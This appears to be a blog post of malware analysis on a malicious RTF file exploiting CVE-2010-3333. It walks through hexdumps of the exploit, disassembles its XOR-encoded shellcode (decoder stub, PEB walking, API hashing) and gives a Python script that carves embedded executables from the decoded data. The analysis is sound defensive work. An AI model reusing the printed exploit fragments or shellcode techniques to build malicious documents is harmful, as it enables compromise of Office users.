vim CVE-2010-3333_DOC.bad {\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;ffffffffff050000000000000000000000.. .. :Vi can be used as a hexdump with the following command :%!xxd 0000000: 7b5c 7274 6631 7b5c 7368 707b 5c2a 5c73 {\rtf1{\shp{\*\s 0000010: 6870 696e 7374 7b5c 7370 7b5c 736e 2070 hpinst{\sp{\sn p 0000020: 4672 6167 6d65 6e74 737d 7b5c 7376 2031 Fragments}{\sv 1 0000030: 3b31 3b66 6666 6666 6666 6666 6630 3530 ;1;ffffffffff050 0000040: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 0000050: 3030 3030 3030 3030 3030 3030 3030 3030 0000000000000000 0000060: 3030 3030 3030 3062 3735 6631 6637 6430 0000000b75f1f7d0 0000070: 3030 3038 3037 6330 3030 3038 3037 6342 000807c0000807cB 0000080: 4242 4242 4242 4243 4343 4343 4343 4344 BBBBBBBCCCCCCCCD 0000090: 4444 4444 4444 4439 3039 3039 3039 3039 DDDDDDD909090909 00000a0: 3039 3034 3134 3134 3134 3134 3134 3134 0904141414141414 00000b0: 3134 3134 3134 3134 3134 3165 3830 3130 14141414141e8010 .... 0000740: 6239 3838 3730 6436 3730 6439 3839 3833 b98870d670d98983 0000750: 3038 3366 3766 3766 3766 3766 3766 3766 083f7f7f7f7f7f7f 0000760: 3765 6230 3665 6230 3430 3932 3330 3033 7eb06eb040923003 0000770: 3065 6230 3665 6230 3438 6332 3430 3033 0eb06eb048c24003 0000780: 3065 3837 3766 3466 6666 667d 7d7d 7d5c 0e877f4ffff}}}}\ 0000790: 6164 6566 6c61 6e67 3130 3235 5c61 6e73 adeflang1025\ans 00007a0: 695c 616e 7369 6370 6739 3336 5c75 6332 i\ansicpg936\uc2 00007b0: 5c61 6465 6666 3331 3530 375c 6465 6666 \adeff31507\def ..... :%!xxd -r :q!Some quick notes in regards to CVE-2010-3333 via Mitre "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
The intent of this post is not to analyze CVE-2010-3333 but rather the encoding algorithm in the shellcode. For more information on the exploit see the following link. The most relevant parts are the rtf file header, the fragment objects (pFragments) and the data following the semicolon. The shellcode resides in the large ascii data block in the range 0-9A-F. If we read two ASCII chars and then treat them as hex/binary we would have valid Intel instructions. Let's see what this would look like in Python
Python 2.7 (r27:82525, Jul 4 2010, 09:01:59) [MSC v.1500 32 bit (Intel)] on win32 Type "copyright", "credits" or "license()" for more information. >>> import sys >>> import os >>> import pydasm >>> # Open our specimen >>> f = open("CVE-2010-3333_DOC.bad","rb") >>> f.seek(0x97) >>> # 0x97 is the start of the ascii encoded shellcode >>> b = f.read(2) >>> buff = "" >>> while b != '': try: buff = buff+chr(int(b,16)) b = f.read(2) except ValueError: breakThe variable buff contains our ascii to binary shellcode. We can use Pydasm to disassemble it.
>>> offset = 0 >>> while offset < len(buff): i = pydasm.get_instruction(buff[offset:],pydasm.MODE_32) print offset , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset) if not i: break offset += i.length 0 inc ecx 1 inc ecx 2 inc ecx 3 inc ecx 4 inc ecx 5 inc ecx 6 inc ecx 7 inc ecx 8 inc ecx 9 inc ecx 10 inc ecx 11 inc ecx 12 call 0x12 17 add [ebx-0x3b7cdbf4],cl 23 add al,0x8d 25 dec ecx 26 adc al,[ecx-0x80] 29 xor [edi-0x80],esp 32 cmp [eax+0x600df775],edx 38 psubd mm6,[esi] .... 85 push dword 0x1300f74 90 push byte 0xffffff98 92 NoneNotice after address 12 the code turns to junk instructions. This is caused by our disassembly being off by 1 byte after the call. We can modify our pydasm loop to skip this null byte.
>>> offset = 0 >>> while offset < len(buff): i = pydasm.get_instruction(buff[offset:],pydasm.MODE_32) print hex(offset) , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset) if not i: break offset += i.length if offset == 17: offset += 1 0x0 inc ecx 0x1L inc ecx 0x2L inc ecx 0x3L inc ecx 0x4L inc ecx 0x5L inc ecx 0x6L inc ecx 0x7L inc ecx 0x8L inc ecx 0x9L inc ecx 0xaL inc ecx 0xbL inc ecx 0xcL call 0x12 0x12L mov ecx,[esp] 0x15L add esp,0x4 0x18L lea ecx,[ecx+0x12] 0x1bL inc ecx 0x1cL xor byte [ecx],0x67 0x1fL cmp byte [ecx],0x90 0x22L jnz 0x1b 0x24L or eax,0x36fa0f60 ....... 0x53L aad 0x51 0x55L push dword 0x1300f74 0x5aL push byte 0xffffff98 0x5cL NoneNote: address changes to hex. At the address 0x12 we can see the start of the XOR loop with a key of 0x67. The rest of the code is junk due to it being XORed. The next step to get to the second stage of the shellcode.
>>> buff2 = buff[:35] # Read past XOR loop >>> c = 36 >>> while c < (len(buff)-36): buff2 = buff2 + chr(ord(buff[c])^0x67) c += 1The above code is a simple XOR loop. Now we can dissasemble the second stage using Pydasm
>>> offset = 0 >>> while offset < len(buff2): i = pydasm.get_instruction(buff2[offset:],pydasm.MODE_32) print hex(offset) , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset) if not i: break offset += i.length if offset == 17: offset += 1 0x0 inc ecx 0x1L inc ecx 0x2L inc ecx 0x3L inc ecx 0x4L inc ecx 0x5L inc ecx 0x6L inc ecx 0x7L inc ecx 0x8L inc ecx 0x9L inc ecx 0xaL inc ecx 0xbL inc ecx 0xcL call 0x12 0x12L mov ecx,[esp] 0x15L add esp,0x4 0x18L lea ecx,[ecx+0x12] 0x1bL inc ecx 0x1cL xor byte [ecx],0x67 0x1fL cmp byte [ecx],0x90 0x22L jnz 0x8e 0x24L pop es 0x25L push dword 0x3519d 0x2aL push dword 0x2d000 0x2fL push dword 0x819d ........ 0x8fL xor edx,edx 0x91L mov ebx,fs:[edx+0x30] ; GET PEB 0x95L mov ecx,[ebx+0xc] 0x98L mov ecx,[ecx+0x1c] .... 0xbaL mov esi,[ebx+edi*4] 0xbdL add esi,ebp 0xbfL cwd 0xc0L movsx eax,[esi] 0xc3L cmp al,ah 0xc5L jz 0xcf 0xc7L ror edx,0x7 ; ROR API HASH 0xcaL add edx,eax 0xccL inc esi 0xcdL jmp 0xc0 ... 0x1b1L mov [ebp+0x604],ebx 0x1b7L xor ecx,ecx 0x1b9L lea esi,[ebp+ecx+0x200] 0x1c0L lodsb 0x1c1L xor al,cl ; decode 0x1c3L xchg edx,edi 0x1c5L lea edi,[ebp+ecx+0x200] 0x1ccL stosb 0x1cdL xchg edx,edi 0x1cfL inc ecx 0x1d0L cmp ecx,[ebp+0x604] 0x1d6L jnz 0x1b9 ; loop ... 0x34eL push ebp 0x34fL mov ebp,esp 0x351L mov eax,[edi-0x14] 0x354L inc [eax]Now that we have our shellcode. If we scroll up we will see a loop with xor al, cl and then an inc ecx. This is our xor-count-up loop. This type of encoding can be tricky because we have to know the exact offset of where the loop starts decoding data. Usually this means we would have to do some good old fashioned static analysis. There's only so many times we can reverse shellcode until you get bored. Let's get creative. Let's try something that hasn't been done before (probably wrong?). We know it's a xor-count-up so let's mimic the pattern the XOR would create in null data.
>>> o = open('out.bin','wb+') >>> d = f.read() >>> k = '' >>> for x in range(0,0xff): k = k + chr(x) >>> k '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r...' # Get subset of the full XOR-Countup outpu
>>> key = k[:15]Note: The k value was edited due to formatting issues. For a screenshot of the output please see the following link.
This is where things get kind of interesting with the encoding. Firstly we are going to do a search for a subset (key) of the recurring pattern (k). The pattern would appear on null bytes that have been XORed with count-up. We choose a subset because the full pattern would not likely be present because the null bytes would need to have a length of 255. If we know the address of k and the algorithm we can calculate the one to one relationship of the first value 0x0-0xFF to the first byte of the file. Once we have that information we will just need to mimic the xor-count-up code from the start of the file.
>>> # >>> i = (0xff - (d.find(key)&0xff)) + 1 >>> b= '' >>> for val in d: b = str(b) + chr(ord(val)^(i&0xff)) i += 1 >>> o.write(b) >>> o.close() >>> f.close() >>>Let's see what our saved off buffer looks like in a VIM hexdump.
vim out.bin 0000000: 8d8c ae92 9090 909b 9997 9dca cccf cba3 ................ 0000010: 616f 716a 5864 6874 616a 7a6c 353e 3853 aoqjXdhtajzl5>8S 0000020: 6572 204f 7571 7371 7e2a 2b2e 2c2a 427b er Ouqsq~*+.,*B{ 0000030: 4547 4413 7856 5254 404f 4e49 4f45 1d1e EGD.xVRT@ONIOE.. 0000040: 0501 076f 4741 455f 5e55 5558 540e 0f0a ...oGAE_^UUXT... 0000050: 7077 1e30 3036 2e21 2020 2923 7f7c 7b7f pw.006.! )#.|{. 0000060: 660d 2127 273d 3035 316a 6b6e 6c6a 023b f.!''=051jknlj.; .. :/This 00255b0: 0000 0000 0408 b004 4d5a 9000 0300 0000 ........MZ...... 00255c0: 0400 0000 ffff 0000 b800 0000 0000 0000 ................ 00255d0: 4000 0000 0000 0000 0000 0000 0000 0000 @............... 00255e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00255f0: 0000 0000 f000 0000 0e1f ba0e 00b4 09cd ................ 0025600: 21b8 014c cd21 5468 6973 2070 726f 6772 !..L.!This progr 0025610: 616d 2063 616e 6e6f 7420 6265 2072 756e am cannot be run 0025620: 2069 6e20 444f 5320 6d6f 6465 2e0d 0d0a in DOS mode.... 0025630: 2400 0000 0000 0000 b3bf 303a f7de 5e69 $.........0:..^i :q!Yeah, that's hot. Now that we have the file decoded we can carve out the executable from the data stream. The first indicator for an embedded executable is the MZ header. If we find the MZ header we would need to jump 0x3c bytes, read the value, jump to that value, check for the PE header... or we could use pefile to validate the PE file for us. All we need to do is search a stream of data for the MZ header, set the file pointer to that address, read till end of file, pass the data to pefile and then check for errors. If there is no errors we will have pefile trim the file and then write it to disk. This might not be the best method if the file is large or if we were overly concerned about file overlays.
import pefile import re import sys def carve(f): c = 1 for y in [tmp.start() for tmp in re.finditer('\x4d\x5a',f.read())]: f.seek(y) try: pe = pefile.PE(data=f.read()) except: pass continue # determine file ext if pe.is_dll() == True: ext = 'dll' if pe.is_driver() == True: ext = 'sys' if pe.is_exe() == True: ext = 'exe' o = open(str(c)+ '.' + ext, 'wb') print ext , 'found at offset', hex(y) o.write(pe.trim()) o.close() c = c + 1 ext = '' f.seek(0) pe.close() def main(argv): if len(sys.argv) < 2: print "cpe.py <file-stream>" else: i = open(sys.argv[1], "rb") carve(i) i.close() if __name__== '__main__': main(sys.argv[1:])Output from the above script on the out.bin
python cpe.py out.bin exe found at offset 0x7a10 dll found at offset 0x255b8
No comments:
Post a Comment